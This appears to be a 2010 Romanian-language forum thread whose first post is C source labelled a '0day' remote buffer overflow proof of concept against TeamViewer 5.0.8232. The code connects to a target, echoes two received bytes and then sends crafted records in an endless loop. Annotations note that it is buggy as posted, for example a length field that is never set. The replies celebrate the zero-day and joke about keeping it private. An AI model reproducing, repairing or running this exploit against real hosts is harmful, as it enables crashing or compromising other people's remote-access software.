begood Posted May 18, 2010 Report Posted May 18, 2010
/*
 * Network client that its own POCNAME string labels a proof of concept for a
 * remote buffer overflow in TeamViewer 5.0.8232. Nothing on this page names the
 * affected code path, an advisory or a fixed version, so that label is the
 * author's claim rather than something the listing itself demonstrates.
 *
 * What the code visibly does: connects over TCP to the -h/-p target, reads two
 * single bytes from the peer, then loops forever sending 5-byte records made of
 * those two bytes, a third byte alternating 21/15, and a 16-bit length field
 * taken from `slen`. It never reads a reply inside the loop.
 *
 * Defensive reading: a sensor in front of a TeamViewer listener would see a
 * client echo the first two bytes it was sent and then stream such records
 * back-to-back on one connection; the help text names 5938 as the port.
 */
#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<unistd.h>
/* Unchecked, cast malloc wrapper; `n` is not parenthesised in the expansion. */
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define POCNAME "[*]TeamViewer 5.0.8232 remote BOF poc(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef int i32;
typedef char i8;
typedef short i16;
enum { True=1, False=0, Error=-1 };
/* Both linger fields are 1; passed to SO_LINGER in main(). */
struct linger ling = {1,1};
/* Target address string; stays NULL unless -h is supplied. */
i8* host;
/* NOTE(review): help text mentions a default of 5938, but nothing in this
 * listing assigns it; port stays 0 unless -p is supplied. */
i16 port;
/* File-scope, hence zero-initialised. `slen` is never assigned anywhere in this
 * listing, so the length field written in main() is always 0 and the
 * `if(slen)` branch there is never taken as posted. */
i32 ver1,ver2,slen;
/* Prints the two usage lines. */
void syntax(){
    i8 *help[]={"\t-h hostname", "\t-p port(default 5938)", };
    i32 i;
    size_t com=sizeof help / sizeof help[0];
    /* signed i is compared with unsigned com */
    for(i=0;i<com;i++){
        printf("%s\n",help[i]);
    }
}
/*
 * Parses "-h <host>" and "-p <port>" into the globals above.
 * Returns Error on an unknown option; the success path falls off the end
 * without a return statement, and main() ignores the result either way.
 */
i32 arguments(i32 argc,i8** argv){
    i32 i;
    /* Dropping the last index is what keeps argv[++i] below inside argv. */
    argc--;
    for(i=1;i<argc;i++){
        /* Only the second character is inspected; the leading '-' and the
         * string length are not checked. */
        switch(argv[i][1]){
            case'h':
                host=argv[++i];
                break;
            case'p':
                /* atoi reports no errors; the int result is narrowed to i16 */
                port=atoi(argv[++i]);
                break;
            default:{
                printf("error with argument nr %d:(%s)\n",i,argv[i]);
                return Error;
                exit(0); /* unreachable after the return above */
            }
        }
    }
}
/*
 * Entry point: parse options, connect, read two bytes, then send records in an
 * endless loop until a send() comes back short. Every failure path exits with
 * status 0, so the exit code does not distinguish success from failure.
 */
i32 main(i32 argc,i8** argv){
    if(argc<2){
        printf("%s\n%s\n",POCNAME,AUTHOR);
        printf("\tToo few arguments\n syntax is:\n");
        syntax();
        exit(0);
    }
    arguments(argc,argv);
    i32 sok,i, svcon, sokaddr;
    /* Neither allocation is checked for NULL, and neither is freed. */
    i8 *sendbytes=ALOC(i8,32768), *recevbytes=ALOC(i8,5548);
    printf("[*]Starting \n \t...\n");
    struct sockaddr_in sockaddr_sok;
    sokaddr = sizeof(sockaddr_sok);
    sockaddr_sok.sin_family = AF_INET;
    /* host is passed unchecked: NULL when -h was not given; inet_addr's
     * result is not validated either. */
    sockaddr_sok.sin_addr.s_addr = inet_addr(host);
    sockaddr_sok.sin_port = htons(port);
    sok=socket(AF_INET,SOCK_STREAM,0);
    if(sok==-1){
        printf("[*]FAILED SOCKET\n");
        exit(0);
    }
    /* Precedence: `<` binds tighter than `=`, so svcon receives the result of
     * the comparison (0 or 1), not connect()'s return value. */
    if(svcon=connect(sok,(struct sockaddr*)&sockaddr_sok,sokaddr)<0){
        printf("Error with connection\n");
        shutdown(sok,1);
        exit(0);
    }
    if(setsockopt(sok, SOL_SOCKET, SO_LINGER, (i8*)&ling, sizeof(ling))<0){
        printf("Error setting the socket\n");
        shutdown(sok,1);
        exit(0);
    }
    /* Each recv stores a single byte at the start of a 4-byte int; the other
     * bytes keep their zero initialisation. */
    if(recv(sok,&ver1,1,0)!=1) exit(0);
    if(recv(sok, &ver2,1,0)!=1) exit(0);
    /* Clears only the first 250 of the 32768 allocated bytes. */
    memset(sendbytes,0,250);
    /* sizeof(recevbytes) is the size of the pointer, not the 5548-byte buffer,
     * so at most a pointer's width of data is read; the result is discarded. */
    recv(sok,recevbytes,sizeof(recevbytes),0);
    for(i=0;;i++) {
        /* progress counter, printed every 16th iteration */
        if(!(i & 15)) printf("%d\r", i);
        /* Record header: the two bytes received above, narrowed to char ... */
        sendbytes[0] = ver1;
        sendbytes[1] = ver2;
        /* ... a third byte alternating 21 (even i) and 15 (odd i) ... */
        sendbytes[2] = (i & 1) ? 15 : 21;
        /* ... and a 16-bit length in host byte order, stored through a cast at
         * an odd offset (unaligned store). */
        *(i16 *)(sendbytes + 3) = slen;
        if(send(sok, sendbytes, 5, 0) != 5) break;
        /* Body of `slen` bytes filled with the low byte of i; skipped while
         * slen is 0. */
        if(slen) {
            memset(sendbytes, i, slen);
            if(send(sok, sendbytes, slen, 0) != slen) break;
        }
    }
    /* Second argument 1 — presumably SHUT_WR on the target platform; the
     * socket is never close()d. */
    shutdown(sok,1);
    return 0;
}
bravo pentru fl0 fl0w !la cat mai multe ! Quote
adonisslanic Posted May 18, 2010 Report Posted May 18, 2010 Cand vad 0-day undeva, am un mic braingasm )) kudos for fl0 fl0w si desigur begood <()> Quote
Flubber Posted May 18, 2010 Report Posted May 18, 2010 Si asa multi kinderz voiau ceva pentru TeamViewer. Oricum felicitari lui fl0 fl0w, si bineinteles, mai ales ca este 0-day (pentru public cel putin)... keep it priv8.//e public.stiu, dar ma refeream sa nu ajunga pe mana kinderilor desi odata facut public slabe sanse Quote
begood Posted May 18, 2010 Author Report Posted May 18, 2010 (edited)
> e public. stiu, dar ma refeream sa nu ajunga pe mana kinderilor, desi odata facut public slabe sanse
de ce crezi ca se posteaza sursa? "kinderii" nu stiu compila
Edited May 18, 2010 by begood Quote
phantomas90 Posted May 20, 2010 Report Posted May 20, 2010 Nu am mai lucrat pana acum cu C si nici C++. Imi zice ca nu gaseste librariile `#include<sys/types.h>`, `#include<sys/socket.h>`, `#include<netinet/in.h>`, `#include<unistd.h>`. Le are de obicei C-ul sau trebuie downloadate separat? Nu stiu... poate sunt intrebari de nestiutor... dar as vrea sa invat un pic de C Quote